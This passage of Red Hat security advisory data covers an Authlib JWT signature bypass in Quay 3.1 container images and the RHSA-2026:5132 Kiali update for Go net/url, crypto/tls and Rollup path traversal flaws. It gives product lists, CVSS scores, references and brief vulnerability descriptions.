"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
}
]
}
RHSA-2026:5132
Vulnerability from csaf_redhat - Published: 2026-03-19 14:09 - Updated: 2026-04-12 20:00Summary
Red Hat Security Advisory: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6
Severity
Important
Notes
Topic: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: Kiali 1.73.28, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.
Security Fix(es):
* kiali-rhel8: Memory exhaustion in query parameter parsing in net/url (CVE-2025-61726)
* kiali-rhel8: Rollup: Remote Code Execution via Path Traversal Vulnerability (CVE-2026-27606)
* kiali-rhel8: Unexpected session resumption in crypto/tls (CVE-2025-68121)
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
7.4 (High)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Kiali 1.73.28, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.\n\nSecurity Fix(es):\n\n* kiali-rhel8: Memory exhaustion in query parameter parsing in net/url (CVE-2025-61726)\n\n* kiali-rhel8: Rollup: Remote Code Execution via Path Traversal Vulnerability (CVE-2026-27606)\n\n* kiali-rhel8: Unexpected session resumption in crypto/tls (CVE-2025-68121)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5132",
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2025-61726",
"url": "https://access.redhat.com/security/cve/cve-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2025-68121",
"url": "https://access.redhat.com/security/cve/cve-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-27606",
"url": "https://access.redhat.com/security/cve/cve-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5132.json"
}
],
"title": "Red Hat Security Advisory: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6",
"tracking": {
"current_release_date": "2026-04-12T20:00:51+00:00",
"generator": {
"date": "2026-04-12T20:00:51+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5132",
"initial_release_date": "2026-03-19T14:09:55+00:00",
"revision_history": [
{
"date": "2026-03-19T14:09:55+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-19T14:10:03+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-12T20:00:51+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 2.6",
"product": {
"name": "Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Ac37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Aaf899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3Aa51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
